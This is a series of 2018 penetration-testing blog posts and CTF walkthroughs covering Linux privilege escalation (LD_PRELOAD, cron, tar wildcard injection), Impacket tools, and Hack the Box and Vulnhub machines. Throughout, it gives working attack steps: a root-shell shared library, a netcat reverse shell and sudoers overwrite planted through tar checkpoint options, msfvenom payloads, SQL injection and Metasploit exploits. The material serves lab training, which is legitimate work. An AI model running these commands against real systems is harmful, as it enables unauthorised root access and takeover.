Linux Privilege Escalation using LD_Preload

June 14, 2018, 9:28 am

≫ Next: Beginner Guide to impacket Tool kit

≪ Previous: Multiple Ways to Get root through Writable File

Hello friends, today we are going to discuss a new technique of privilege escalation by exploiting an environment variable “LD_Preload” but to practice this you must take some help from our previous article.

Table of contents

Introduction

Shared Libraries

Shared Libraries Names

LD_Preload

Lab setup

Post-Exploitation

Introduction

Shared Libraries

Shared libraries are libraries that are loaded by programs when they start. When a shared library is installed properly, all programs that start afterwards automatically use the new shared library.

Shared Libraries Names

Every shared library has a special name called the ``soname''. The soname has the prefix ``lib'', the name of the library, the phrase ``.so'', followed by a period and a version number.

The dynamic linker can be run either indirectly by running some dynamically linked program or shared object. The programs ld.so and ld-linux.so* find and load the shared objects (shared libraries) needed by a program, prepare the program to run, and then run it. (read from here)

LD_Preload:It is an environment variable that lists shared libraries with functions that override the standard set, just as /etc/ld.so.preload does. These are implemented by the loader /lib/ld-linux.so

For more information read from here.

Lab setup

It is important that logged user must have some sudo rights, therefore, we have given some sudo rights such as /usr/bin/find to be executed by sudo user. But apart from that, there is some Default specification where you can set an environment variable to work as sudo.

To do this follow below steps:

· Open /etc/sudoers file by typing visudo

· Now give some sudo rights to a user, in our case “raj” will be members of sudoers.

Raj ALL=(ALL=ALL) NOPASSWD: /usr/bin/find

· Then add following as default specification to set environment for LD_preload.

Defaults env_keep += LD_PRELOAD

Post-Exploitation

To exploit such type of vulnerability we need to compromise victim’s machine at once then move to privilege escalation phase. Suppose you successfully login into victim’s machine through ssh now for post exploitation type sudo -l command to detect it. And notice the highlighted environment variable will work as sudo.

Let’s generate a C-program file inside /tmp directory.

#include

void _init() {

unsetenv("LD_PRELOAD");

setgid(0);

setuid(0);

system("/bin/sh");

}

Then save it as shell.c inside /tmp.

As discussed let’s compile it to generate a shared object with .so extension likewise .dll file in Windows operating system and hence type following:

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

ls -al shell.so

sudo LD_PRELOAD=/tmp/shell.so find

whoami

Yuppieeee!!!! We got the ROOT access.

↧

Beginner Guide to impacket Tool kit

June 17, 2018, 12:31 am

≫ Next: Hack the Box Challenge: Chatterbox Walkthrough

≪ Previous: Linux Privilege Escalation using LD_Preload

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC). According to the Core Security Website, Impacket supports protocols like IP, TCP, UDP, ICMP, IGMP, ARP, IPv4, IPv6, SMB, MSRPC, NTLM, Kerberos, WMI, LDAP etc.

For the following practical we will require two systems,

1. A Windows Server with Domain Controller Configured

2. A Kali Linux

Here, in our lab scenario we have configured the following settings on our systems.

Windows Server Details

· Domain: SERVER

· User: Administrator

· Password: T00r

· IP Address: 192.168.1.140

Kali Linux: 192.168.1.135

Before beginning with the Impacket tools, let’s do a Nmap version scan on the target windows server to get the information about the services running on the Windows Server.

nmap -sV 192.168.1.140

As you can see in the above screenshot, we have domain services, Kerberos Services, Netbios Services, LDAP services and Windows RPC services.

Now let’s install the Impacket tools from GitHub. You can get it from here.

Firstly, clone the git, and then install the Impacket as shown in the screenshot.

git clone https://github.com/CoreSecurity/impacket.git

cd impacket/

python setup.py install

This will install Impacket on your Kali Linux, now after installation let’s look at what different tools does Impacket have in its box.

cd impacket/examples

These are the some of the tools included in impacket, let’s try some of them

Ping.py

Simple ICMP ping that uses the ICMP echo and echo-reply packets to check the status of a host. If the remote host is up, it should reply to the echo probe with an echo-reply packet.

./ping.py

Syntax: ./ping.py [Source IP] [Destination IP]

./ping.py 192.168.1.135 192.168.1.140

Here we can see that we are getting the ICMP reply from 192.168.1.140 (Windows Server)

Lookupsid.py

A Windows SID bruteforcer example through [MS-LSAT] MSRPC Interface, aiming at finding remote users/groups.

./lookupsid.py

Syntax: ./lookupsid.py [[domain/] username [: password] @] [Target IP Address]

./lookupsid.py SERVER/Administrator: T00r@192.168.1.140

As you can see that the lookupsid tool had extracted the user and group information from the server

Psexec.py

It lets you execute processes on remote windows systems, copy files on remote systems, process their output and stream it back. It allows execution of remote shell commands directly with full interactive console without having to install any client software.

./psexec.py

Syntax: ./psexec.py [[domain/] username [: password] @] [Target IP Address]

./psexec.py SERVER/Administrator: T00r@192.168.1.140

As you can see that we got a remote shell of the server in the given screenshot

Rpcdump.py

This script will dump the list of RPC endpoints and string bindings registered at the target. It will also try to match them with a list of well-known endpoints.

./rpcdump.py

Syntax: ./rpcdump.py [[domain/] username [: password] @] [Target IP Address]

./rpcdump.py SERVER/Administrator: T00r@192.168.1.140

As you can see below we have the list of RPC targets

Samrdump.py

An application that communicates with the Security Account Manager Remote interface from the MSRPC suite. It lists system user accounts, available resource shares and other sensitive information exported through this service.

./samrdump.py

Syntax: ./samrdump.py [[domain/] username [: password] @] [Target IP Address]

./samrdump.py SERVER/Administrator: T00r@192.168.1.140

As you can see below we have extracted SAM information form the Target Server

Sniff.py

Simple packet sniffer that uses the pcapy library to listen for packets in transit over the specified interface.

. /sniff.py

Choose the interface using the number associated with it. And the sniffing starts.

Sniffer.py

Simple packet sniffer that uses a raw socket to listen for packets in transit corresponding to the specified protocols.

. /sniffer.py

And the sniffer starts to monitor icmp, tcp and udp

Wmiexec.py

It generates a semi-interactive shell, used through Windows Management Instrumentation. It does not require to install any service/agent at the target server. It runs as Administrator. It is highly stealthy.

./wmiexec.py

Syntax: ./wmiexec.py [[domain/] username [: password] @] [Target IP Address]

./wmiexec.py SERVER/Administrator: T00r@192.168.1.140

As you can se below that we have the shell from the Target Server

Wmiquery.py

It allows to issue WQL queries and get description of WMI objects at the target system.

./wmiquery.py

Syntax: ./wmiquery.py [[domain/] username [: password] @] [Target IP Address]

./wmiquery.py SERVER/Administrator: T00r@192.168.1.140

This will open a shell, where you can run WQL queries like

SELECT * FROM Win32_LogicalDisk WHERE FreeSpace < 209152

Atexec.py

This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.

./atexec.py

Syntax: /atexec.py [[domain/] username [: password] @] [Target IP Address] [Command]

./atexec.py SERVER/Administrator: T00r@192.168.1.140 systeminfo

As you can see below that a remote connection was established to the server and the command systeminfo was run on the Target server with the output of the command delivered on the Kali terminal.

getArch.py

This script will connect against a target (or list of targets) machine/s and gather the OS architecture type installed by (ab) using a documented MSRPC feature.

./getArch.py

Syntax: ./getArch.py -target [IP Address]

Command: ./getArch.py -target 192.168.1.140

Here we can see that the architecture of the target system is 64-bit

Ifmap

This script will bind to the target's MGMT interface to get a list of interface IDs. It will use that list on top of another list of interfaces UUID and reports whether the interface is listed and/or listening.

Syntax: ./ifmap.py [Host IP Address] [Port]

./ifmap.py 192.168.1.140 135

./ifmap.py 192.168.1.140 49154

↧

Hack the Box Challenge: Chatterbox Walkthrough

June 17, 2018, 9:48 pm

≫ Next: Linux Privilege Escalation by Exploiting Cron jobs

≪ Previous: Beginner Guide to impacket Tool kit

Hello friends!! Today we are going to solve another CTF challenge “Chatterbox” which is categories as retired lab presented by Hack the Box for making online penetration practices.

Level: Easy

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of chatterbox is 10.10.10.74 so let’s initiate with nmap port enumeration.

nmap -p1-10000 10.10.10.74

It has shown two ports are open but didn’t disclose running services through them.

Therefore we took help from Google and asked to look for any exploit related to these port as shown in the below image. So it put up two exploits related to Achat. First, we tried Metasploit exploit to compromise victim’s machine and almost successfully seized meterprerter session, but the session was getting died in few seconds.

Thus we choose the manual technique to compromise victim's machine by using exploit DB 36025.

Exploit 36025 is already stored inside Kali Linux and we have copied it on the Desktop.

cd Desktop

cp /usr/share/exploitdb/exploits/windows/remote/36025.py .

cat 36025.py

According to this python script, it is exploitable to Buffer overflow and highlighted msfvenom code is used to generate payload.

With the help of above script we execute following command to generate payload.

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp lhost=10.10.14.25 lport=1234 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

Then copied the generated shellcode.

Now open the original 36025.py which you have saved on the desktop and paste above-copied shellcode here and then enter victim’s IP (10.10.10.74) as Server_address. Now start Netcat for reverse connection before running this script.

nc -lvp 1234

Now run your python script to lunch Buffer overflow attack on victim’s machine.

python 36025.py

BOOooOOMM!! Here we command shell of victim’s machine. Let’s finish this task by grabbing both flags.

Inside C:\Users\Alfred\Desktopwe found user.txt flag used type “filename” command for reading this file.

cd Desktop

type user.txt

Great!! We got our 1^st flag successfully

Inside C:\Users \Administrator \Desktop I found the root.txt file and used type “filename” command for reading this file.

cd Desktop

type root.txt

But this file didn’t open due to less permission.

With help of following cacls command, we can observe the permission and can change the file's permissions where we had granted read operate to User: Alfred for the root.txt file.

cacls C:\Users \Administrator \Desktop

cacls root.txt /g Alfred:r

type root.txt

Congratulation!! 2^ndTask is also completed

↧

Linux Privilege Escalation by Exploiting Cron jobs

June 19, 2018, 8:54 am

≫ Next: Hack the Box Challenge: Sneaky Walkthrough

≪ Previous: Hack the Box Challenge: Chatterbox Walkthrough

After solving several OSCP Challenges we decided to write the article on the various method used for Linux privilege escalation, that could be helpful for our readers in their penetration testing project. In this article, we will learn “Privilege Escalation by exploiting Cron Jobs” to gain root access of a remote host machine and also examine how a bad implement cron job can lead to Privilege escalation. If you have solved CTF challenges for Post exploit then by reading this article you will realize the several loopholes that lead to privileges escalation.

For details, you can read our previous article where we had applied this trick for privilege escalation. Open the links given below:

Link1: Hack the Box Challenge: Europa Walkthrough

Link2: Hack the Milnet VM (CTF Challenge)

Table of content

· Introduction

· Cron job

· Crontab syntax

· Crontab File overwrite

· Lab Setup (Ubuntu)

· Exploiting cron job (Kali Linux)

· Crontab Tar wildcard Injection

· Lab Setup (Ubuntu)

· Exploiting cron job (Kali Linux)

Let’s Start!!!

What is cron job?

Cron Jobs are used for scheduling tasks by executing commands at specific dates and times on the server. They're most commonly used for sysadmin jobs such as backups or cleaning /tmp/ directories and so on. The word Cron comes from crontab and it is present inside /etc directory.

For example: Inside crontab we can add following entry to print apache error logs automatically in every 1 hour.

1 0 * * * printf ""> /var/log/apache/error_log

Crontab File overwrite

Lab Setup for Poorly configured cron job

Objective: Set a new job with help of crontab to run a python script which will erase all data from in a particular directory.

Let assume “cleanup” is the directory whose data will be cleared automatically in every two minutes. Thus we have saved some data inside /home/cleanup.

mkdir cleanup

cd cleanup

echo “hello freinds” > 1.txt

echo “ALL files will be deleted in 2 mints” > 2.txt

echo “” > 1.php

echo “” > 2.php

As you can observe from given image some files are stored inside cleanup directory.

Now write a python program in any other directory to delete data from inside /home/cleanup and give it all permission.

cd /tmp

nano cleanup.py

#!/usr/bin/env python

import os

import sys

try:

os.system('rm -r /home/cleanup/* ')

except:

sys.exit()

chmod 777 cleanup.py

At last schedule a task with help of crontab to run cleanup.py for every 2 minutes.

nano /etc/crontab

*/2 * * * * root /tmp /cleanup.py

Now let’s verify the objectives

cd /home/cleanup

date

Coool!! It is working, as you can see all file has been deleted after two minutes.

Post Exploitation

Start your attacking machine and first compromise the target system and then move to privilege escalation stage. Suppose I successfully login into victim’s machine through ssh and access non-root user terminal. Execute the following command as shown below.

cat /etc/crontab

ls -al /tmp/cleanup.py

cat /tmp/cleanup.py

From above steps, we notice the crontab is running python script in every two minutes now let’s exploit.

There so many methods to gain root access as in this method we enabled SUID bits /bin/dash. It is quite simple, first, open the file through some editor, for example, nanocleanup.py and replace “rm -r /tmp/*” from the following line as given below

os.system(‘chmod u+s /bin/dash)

After two minutes it will set SUID permission for /bin/dash and when you will run it will give root access.

/bin/dash

whoami

Awesome!! We hit the Goal…………………

Crontab Tar Wildcard Injection

Lab Setup

Objective: schedule a task with help of crontab to take backup with tar archival program of HTML directory.

The directory should have executable permission whose backup you are going to take.

Now schedule a task with help of crontab to run tar archival program for taking backup of /html inside /var/backups in every 1 minute.

nano /etc/crontab

*/1 * * * * root tar -zcf /var/backups/html.tgz /var/www/html/*

Let's verify the schedule is working or not by executing following command.

cd /var/backup

date

From given below image you can notice the html.tgz file has been generated after 1 minute.

Post Exploitation

cat /etc/crontab

Here we notice the target has scheduled a tar archival program for every 1 minute and we know that cron job runs as root. Let’s try to exploit.

Execute following command to grant sudo right to logged user and following post exploitation is known as wildcard injection.

echo 'echo "ignite ALL=(root) NOPASSWD: ALL"> /etc/sudoers'>test.sh

echo ""> "--checkpoint-action=exec=sh test.sh"

echo ""> --checkpoint=1

tar cf archive.tar *

Now after 1 minute it will grant sudo right to the user: ignite as you can confirm this with the given below image.

sudo -l

sudo bash

whoami

YUPPIEEEE!!! We have successfully obtained root access.

↧

Hack the Box Challenge: Sneaky Walkthrough

June 22, 2018, 10:09 pm

≫ Next: Exploiting Wildcard for Privilege Escalation

≪ Previous: Linux Privilege Escalation by Exploiting Cron jobs

Hello friends!! Today we are going to solve another CTF challenge “Sneaky” which is available online for those who want to increase their skill in penetration testing and black box testing. Sneaky is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.

Level: Intermediate

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.20 so let’s begin with nmap port enumeration.

nmap -sT -sU 10.10.10.20

From given below image, you can observe we found port 80 and 161 are open on target system.

As port 80 is running http we open it in our browser, the website shows that it’s under construction.

We initiate dirb to enumerate the directories hosted on the target machine.

dirb http://10.10.10.20/

We find a directory called /dev/ we open it in our browser and find a login screen.

We find the login page is vulnerable to sql injection; we use this vulnerability to bypass the login page using query ‘or 1=1—in username and password.

After logging in we find a link on the webpage.

We open the link and find a RSA private key. We download the key into our system.

Now the target machine is not running any ssh service so that we can use this to login through ssh.

To investigate further we enumerate SNMP protocol to gain more information.

msf > use auxiliary/scanner/snmp/snmp_enum

msf auxiliary(scanner/snmp/snmp_enum) > set rhosts 10.10.10.20

msf auxiliary(scanner/snmp/snmp_enum) > set threads 5

msf auxiliary(scanner/snmp/snmp_enum) > exploit

After enumerating the target machine we find that maybe ssh is running in ipv6.

We use a python script called Enyx to find the ipv6 address of the target machine. You can get the script from this link.

python enyx.py 2c public 10.10.10.20

After finding the ipv6 address of the target machine we login through ssh using the username and RSA Private key that we find after we login on the /dev/ page.

ssh -I key thrasivoulos@dead:beef:0000:0000:0250:56ff:fe8f:d853

After logging in through ssh we find a file called user.txt we open it and find our first flag. Now we try to find files with suid bit set.

find / -perm -4000 2>/dev/null

We find a binary file called chal in /usr/local/bin we open it in gdb and find there is a strcpy function.

(gdb) set disassembly-flavor intel

(gdb) disas main

Now we try to check if we can overflow the memory through this strcpy function. First we create a 500 byte string using the patter create script in metasploit.

patter_create.rb -l 500

We run the file in gdb and find that the return address was overwritten with the characters in the string.

We check the size that is required to completely overwrite the return address by checking the location of the string that became the return address inside the pattern that we created. We use pattern offset tool to check the corresponding location.

pattern_offset.rb -q 316d4130 -l 500

We find that after 362 bytes the return address gets overwritten. Now we take a look at the stack to find a location for nop sled and shell code.

We picked the stack address 0xbffff510; you can change the stack pointer address and pick the shellcode according to your need. We use python script to create our exploit and pass the output as argument for the file. When we run the command below, we get a tty shell as root user. We move to /root/ directory and find a file called root.txt; we open the file and find our final flag.

↧

Exploiting Wildcard for Privilege Escalation

June 23, 2018, 4:53 am

≫ Next: Hack The Vulnhub Pentester Lab: S2-052

≪ Previous: Hack the Box Challenge: Sneaky Walkthrough

Hello friends!! In this article, we will cover “Wildcard Injection” an interesting old-school UNIX hacking technique, which is still a successful approach for Post exploitation and even many security-related folks haven't heard of it. Here you will get surprised after perceiving some UNIX tools like 'tar' or 'chown' can lead to full system compromise.

Table of content

Introduction

Wildcard

Wildcard wildness example 1

File hijacking example 2

Post Exploitation via tar (Phase I)

Tar Wildcard Injection (1st method)

Post Exploitation via tar (Phase II)

Tar Wildcard Injection (1st method)

Tar Wildcard Injection (2nd method)

Tar Wildcard Injection (3rd method)

Let’s Start!!!

WILDCARD

The wildcard is a character or set of characters that can be used as a replacement for some range/class of characters. Wildcards are interpreted by the shell before any other action is taken.

Some Wildcards character:

* An asterisk matches any number of character in a filename, including none.

? The question mark matches any single character.

[ ] Brackets enclose a set of characters, any one of which may match a single character at that position.

- A hyphen used within [ ] denotes a range of characters.

~ A tilde at the beginning of a word expands to the name of your home directory. Append another user's login name to the character, it refers to that user's home directory.

1^st Example

You might be aware of wildcard symbol and their traditional usage but here we are presenting wildcard wildness and for this, I would like to draw your attention towards below steps.

cd /Desktop

mkdir wild

cd wild

echo “Hello Friends” > file1

echo “This is wildcard Injection” >file2

echo “take help” > --help

So as you can observe, here we have made a new directory "wild" on the desktop then with help of echo command we have created 3 files and written 1 line in each file.

Afterwards, with help of cat command, we try to open all above 3 files as shown:

cat file1

cat file 2

cat --help

However, the first two files opened normally and show the same information as written above. But the cat command failed to read information written inside --help file. Instead of showing “take help” while opening --help file it calls its own --help options from its own libraries & such type of trick is called Wildcard wildness.

File owner hijacking via Chown

Similarly again we try to do something roguish with help of chown command. As we know it is an abbreviation of change owner, which is used on Unix-like systems to modify the ownership of file system files, directories and it may only be changed by a super-user. Let say we have three users in our system.

Super-user (root) - perform admin-level task such as run chown command.

Non-root-user1 (raj) - perform ordinary jobs such as create file

Non-root-user2 (aarti) - perform ordinary jobs such as create file

Mischief-user (Ignite) - perform the notorious task such as Chown file reference trick that can lead file owner hijacking.

In the following image, you can observe all the PHP file is owned by user: raj. Now when the user: ignite found all PHP file is own be user raj then he induce two PHP file himself in the same directory and use file reference trick for file owner hijacking by executing below commands.

ls -al

echo “” > my.php

echo > --reference=my.php

As you can notice, mostly file is owned user: raj and the last two files are owned by user: ignite and when the super-user will be supposed to change ownership of all file having PHP extension with help of wildcard, then all files will indirectly come under the ownership of user: ignite.

As you can observe when root user run chown command to give ownership of all PHP file to the user: aarti, an error occurred and as result, the all PHP file get seized by user: ignite automatically.

chown -R aarti:aarti *.php

ls -al

Conceptual Information:

If you have ever explored chown to read its optional switches then you will find the following option.

--reference=RFILE(use RFILE's owner and group rather than specifying OWNER:GROUP values)

In our case user: ignite executed following commands:

echo “” > my.php

echo > --reference=my.php

Then root user takes help of wildcard character for changing ownership. Thing is that wildcard character used in 'chown' command line took subjective '--reference=.my.php' file and passed it to the chown command at the command line as an option.

Post Exploitation via tar (Phase I)

Lab-Setup

Likewise again we extend the wildness of wildcard character to the ultimate level and it was like a dynamic explosion in terms of system hacking.

Tar is very common UNIX program for creating and extracting archives. And with help of it, we are going to take compress backup of any directory. For example, make a new directory and give ALL permission to it and then create some files.

mkdir html

chmod 777 html

cd html

touch index.html

touch raj

touch file.txt

Now schedule a task with help of crontab to run tar archival program for taking backup of /html from inside /var/backups in every 1 minute.

nano /etc/crontab

*/1 * * * * root tar -zcf /var/backups/html.tgz /var/www/html/*

Let’s verify the schedule is working or not by executing following command.

cd /var/backup

Tar Wildcard Injection (1^st method)

Privilege Escalation

cat /etc/crontab

Here we notice the target has scheduled a tar archival program for every 1 minute and we know that cron job runs as root. Let’s try to exploit.

On a new terminal generate netcat reverse shell malicious code for achieving netcat reverse connection by using msfvenom and enter the following command for that.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.102 lport=8888 R

Copy the generated payload and paste inside victim's shell as described below.

nc -lvp 8888

Now paste above copied payload as describe below and ran the following commands inside victim’s tty shell.

echo "mkfifo /tmp/lhennp; nc 192.168.1.102 8888 0

/tmp/lhennp 2>&1; rm /tmp/lhennp"> shell.sh

echo ""> "--checkpoint-action=exec=sh shell.sh"

echo ""> --checkpoint=1

tar cf archive.tar *

The above commands help the tar command to run the file shell.sh, after the first file is archived. Since the tar command is running as root due to crontab, this has the effect of spawning a netcat shell and sending it to the attack platform on port 8888. And if you go back to the terminal window where the listener was on, you will have victim’s reverse connection in after 1 minute.

whoami

Conceptual Information:

If you have ever explored chown to read its optional switches then you will find the following option.

--checkpoint[=NUMBER] show progress messages every Numbers record (default 10)

--checkpoint-action=ACTION execute ACTION on each checkpoint

There is '--checkpoint-action' option, that will specify the program which will be executed when the checkpoint is reached. Mainly, this permits us to run an arbitrary command. Hence Options '--checkpoint=1' and '--checkpoint-action=exec=sh shell.sh' are handed to the 'tar' program as command line options.

Post Exploitation via tar (Phase II)

Lab Setup

There are multiple ways to take compressed backup and multi techniques can also be applied for privilege escalation. In this phase, with help of tar, we are going to take compress backup of a directory. For example, make a new directory whose backup you wish to take and give ALL permission to it and then create some files.

cd /tmp

mkdir data

cd data

echo “” > f1

echo “” > f2

echo “” > f3

Now in other directory write a bash script for taking backup of /tmp/data with help of tar archive program.

mkdir info

cd info

nano script.sh

chmod 777 script.sh

#!/bin/bash

cd /tmp/data

tar cf /backup/backup.tgz *

Now schedule a task with help of crontab to run tar archival program for taking backup of /html inside /var/backups in every 1 minute.

nano /etc/crontab

*/1 * * * * root /info/script.sh

And after 1 minute you will notice backup.tgz file is generated inside info directory.

Tar Wildcard Injection

Privilege Escalation

cat /etc/crontab

Here we notice the target has scheduled a bash program script for every 1 minute and we know that cron job runs as root. The minute attacker read the program written inside the script.sh, he can apply tar wildcard injection.

Again generate netcat reverse shell payload as done above.

And again repeat above step as shown in the image.

Then get back to netcat shell for victim’s reverse connection and you will notice after 1 minute you get victim’s netcat session.

whoami

cd /root

pwd

Hence, the target can be easily exploited if he makes usage tar archive program either by scheduling job via command or through bash script.

Tar Wildcard Injection (2^nd method)

Privilege Escalation

Basically, with help wildcard injection an attack want to gain the highest privilege of the system, therefore, he will try to inject some malicious code with help of tar for root access. But there are multiple ways to obtain root access and hence you can apply following techniques for privilege escalation.

Suppose you have victim's machine as a non-root user and for privilege escalation either take root access or try to give sudo right to non-root user by adding him sudoers file. Thus you can take help of following commands.

echo 'echo "ignite ALL=(root) NOPASSWD: ALL"> /etc/sudoers'> demo.sh

echo ""> "--checkpoint-action=exec=sh demo.sh"

echo ""> --checkpoint=1

tar cf archive.tar *

With the help of above command we had tried to give root permission to the user: ignite and for 1 minute. After 1 minute passed we successfully owned root account.

sudo -l

sudo bash

whoami

Tar Wildcard Injection (3^rd method)

Privilege Escalation

There are multiple ways for privilege escalation with help of tar injection but we are discussing very few methods among them. Suppose you have victim's machine as the non-root user and for privilege escalation, you can try to enable SUID bit for any system binaries and likewise above again you can take help of the following command for obtaining root access.

echo "chmod u+s /usr/bin/find"> test.sh

echo ""> "--checkpoint-action=exec=sh test.sh"

echo ""> --checkpoint=1

tar cf archive.tar *

ls -al /usr/bin/find

find f1 -exec "whoami" \;

root

find f1 -exec "/bin/sh" \;

whoami

WOOhOOO!! Hope you people will enjoy this trick while penetration testing.

Source: https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt

↧

Hack The Vulnhub Pentester Lab: S2-052

June 25, 2018, 2:31 am

≫ Next: Hack The Gemini Inc (CTF Challenge)

≪ Previous: Exploiting Wildcard for Privilege Escalation

Hello friend!! Today we are going to exploit another VM lab which is designed by Pentester Lab covers the exploitation of the Struts S2-052 vulnerability. The REST Plugin is using a XStreamHandler with an instance of XStream for deserialization without any type filtering and this can lead to Remote Code Execution when deserializing XML payloads.

Source: https://cwiki.apache.org/confluence/display/WW/S2-052

Table of content

§ Introduction

§ Download VM

§ Enumeration (Nmap)

§ Surfing Port 80

§ Exploit the target (Metasploit)

Let’s Exploit!!

Download it from here and run this VM. Then check its network configuration through ifconfig command.

Since target belongs to 192.168.1.103 network, let’s go for its enumeration with help of nmap following command to identify running service and version.

nmap -A 192.168.1.103

From nmap scanning result we enumerated following details:

Http-server-header: Apache-coyote/1.1

Http-title: orders

Requested resource: /order.xhtml

So when we have explored /order.xhtml through the web browser it put up following webpage.

Further, we explore user Bob it brings us inside order3 web page.

Since the author has already declared that is vm is vulnerable to the Struts S2-052 therefore with the help of following module of metasploit we can directly exploit it to obtain command shell of target vm.

msf> use exploit/multi/http/struts2_rest_xstream

msfexploit(multi/http/struts2_rest_xstream) > set rhost 192.168.1.103

msfexploit(multi/http/struts2_rest_xstream) > set rport 80

msfexploit(multi/http/struts2_rest_xstream) > set TARGETURI /orders/3

msfexploit(multi/http/struts2_rest_xstream) > exploit

BOOOOOOM!!! Here we owned the command shell of victim’s vm.

↧

Hack The Gemini Inc (CTF Challenge)

June 25, 2018, 11:14 pm

≫ Next: Hack The Box : Nineveh Walkthrough

≪ Previous: Hack The Vulnhub Pentester Lab: S2-052

Gemini Inc has contacted you to perform a penetration testing on one of their internal systems. This system has a web application that is meant for employees to export their profile to a PDF. Identify any vulnerabilities possible with the goal of complete system compromise with root privilege. To demonstrate the level of access obtained, please provide the content of flag.txt located in the root directory as proof.

Download it from here.

Penetrating Methodologies

· Scanning (NMAP)

· Abusing web application for export injection vulnerability

· Exploit web application via html iframe

· Steal SSH RSA file

· Access tty shell through ssh login

· Enumerate file having SUID bit

· Privilege Escalation

· Get root shell

· Complete the task and capture the Flag.txt

Let’s GO000!!!

To scan our target IP we will use aggressive scan (-A)

nmap -p- -A 192.168.1.103 --open

As result, it figures out port 22 and 80 was open. Also found a directory /test2. When explored target IP through the web browser it put up following web page as discussed.

Then we explored /test2 where we read following message for admin and also look after at the URL given here.

Then at login form, we tried the hit-try method for login into the admin console and luckily at 5^th attempt we get successful login when we submit following credential.

Username: admin

Password: password123

After login into admin console successfully we check available action that can be performed by the administrator and here it shows following actions.

§ Edit profile

§ Export profile

So we execute export profile to observe what is in actually it is exporting but could not figure out from its output as shown in below image, therefore, we decided to capture its request.

Further, with help of burp suit, we try to capture its browser request and sent the Intercepted request into the repeater and here I saw the export script possibly gave us the user profile page admin in PDF format by a tool named wkhtmltopdf.

Security breaches if the web application does not filter the user’s input, the server is exposed to several loopholes Because the most common exposures on the web, is the possibility to download an arbitrary file from a server. This state establishes a critical security issue, as it provides an attacker the ability to download delicate information from the server. For example download /etc/passwd file and so on.

We can abuse the wkhtmltopdf and try to download delicate information. Here we have written the following code for the index.php script that redirects to the any requested file.

In order to transfer it into victim's machine, therefore, we launch PHP server for file transfer.

php -S 0.0.0.0:4444

We got a hint for export injection from this source: https://securityonline.info/export-injection-new-server-side-vulnerability/ and its bases we proceed for following steps.

Now go with Action -> edit profile

Then injecting the following HTML code inside the text filed given for the Display name

Now go with Action -> export profile

TERRIFIC!!!! It stands on our expectation and we have /etc/passwd file in front of us. here we can clearly observe UID GID 1000 for user: gemini1.

From nmap scan result we had seen there was a hint for SSH RSA key and we also knew the first username of this VM, therefore let’s try to export RSA file.

Now go with Action -> edit profile

Then injecting the following HTML code inside the text filed given for the Display name

Now go with Action -> export profile

Feeling Incredible J After observing the following result, download it quickly.

With help of downloaded RSA file connect to victim's VM via ssh.

ssh -i login_rsa gemini1@192.168.1.103

Then without wasting your time search for the file having SUID or 4000 permission with help of Find command for post exploitation.

find / -perm -u=s -type f 2>/dev/null

Here we can also observe an interesting file/usr/bin/listinfo having suid permissions. And after exploring this file we notice it probably running natstat and date. Hence we can escalate privilege by exploiting environment PATH Variable, you can take help of our article from hereto know more about it.

cd /tmp

echo “/bin/sh” > date

chmod 777 date

echo $PATH

export PATH=/tmp:PATH

/usr/bin/listinfo

As you can observe after that we execute id command and accomplished by root id.

Now let's finished this task by capturing the flag.txt flag from inside root directory.

cd root

cat flag.txt

↧

Hack The Box : Nineveh Walkthrough

June 27, 2018, 12:31 am

≫ Next: Hack The Kioptrix Level-1 VM

≪ Previous: Hack The Gemini Inc (CTF Challenge)

Hello friends!! Today we are going to solve another CTF challenge “Nineveh” which is categories as retired lab presented by Hack the Box for making online penetration practices.

Level: Intermidate

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Nineveh is 10.10.10.43so let’s initiate with nmap port enumeration.

nmap -A 10.10.10.43

it enumerated port 80 and 443 are open.

We explored port 80 but didn’t observe any remarkable clue for next step.

So next, we use the dirb tool of kali to enumerate the directories and found some important directories such as http://10.10.10.43/department/ then went to the web browser to explore them.

dirb http://10.10.10.43 /usr/share/wordlist/dirb/big.txt

It put-up login page as shown here.

So we try the random combination of username and password. While we have enter username: admin and Password: password it gave an error “Invalid Password” hence it was sure that the username must be admin.

Then with help of burp suit we made brute force attack and use rockyou.txt file as password dictionary. Thus we obtain correct combination for login.

Username:admin

Password: 1q2w3e4r5t

Used above credential for login and get into admin console as shown.

At Notes tab we concluded that the given text of a file stored at someplace in the system entitled with ninevehNotes.txt.

After that we also we explored port 443 and observe the following web page. We also look at it view source but didn’t notice any further hint.

Therefore again use dirb tool for directory brute force attack and observe the /db directory.

dirb https://10.10.10.43 /usr/share/wordlist/dirb/big.txt

For a second time we explored above enumerated directory and observe login page for phplightAdmin v1.9.

Again we lunch brute forced the password field on /db with burp suit and got the password: password123.

By using password123 and we get inside the PHP LiteAdmin dashboard. Then with help of Google we found the trick to exploit it after reading description from exploit DB 24044.

After reading the description from exploit 24044 then we create a new database “ninevehNotes.txt.shell.php”

